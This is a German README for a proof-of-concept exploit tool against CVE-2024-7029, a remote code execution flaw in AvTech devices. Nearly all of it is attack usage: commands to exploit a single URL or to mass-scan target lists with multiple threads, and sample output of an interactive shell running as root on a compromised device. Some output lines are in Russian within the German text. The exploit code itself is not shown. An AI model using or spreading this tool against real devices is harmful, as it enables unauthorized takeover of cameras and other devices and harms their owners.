
Ein PoC-Exploit für die Schwachstelle CVE-2024-7029 in AvTech-Geräten, die Remote Code Execution (RCE) ermöglicht.
GenAvTechRCEExploit Ein PoC-Exploit für die CVE-2024-7029-Schwachstelle in AvTech-Geräten, der Remote-Code-Ausführung (RCE) ermöglicht. Dieses Tool kann nach anfälligen Geräten scannen und interaktiv Befehle auf ihnen ausführen.
requests-Bibliothekprompt_toolkit-Bibliothekalive_progress-BibliothekInstallieren Sie die benötigten Bibliotheken mit:
pip install -r requirements.txt
Um ein einzelnes Ziel auf Schwachstellen zu überprüfen und eine interaktive Shell zu starten:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
Ersetzen Sie <target_url> durch die tatsächliche URL des Zielgeräts.
Um mehrere, in einer Datei angegebene Ziele zu scannen (eine URL pro Zeile):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
Ersetzen Sie <file_path> durch den Pfad zu Ihrer Datei mit den Ziel-URLs.
Sie können die Anzahl der Threads für das Scannen mit der Option -t angeben:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
Standardmäßig ist die Anzahl der Threads auf 10 gesetzt.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20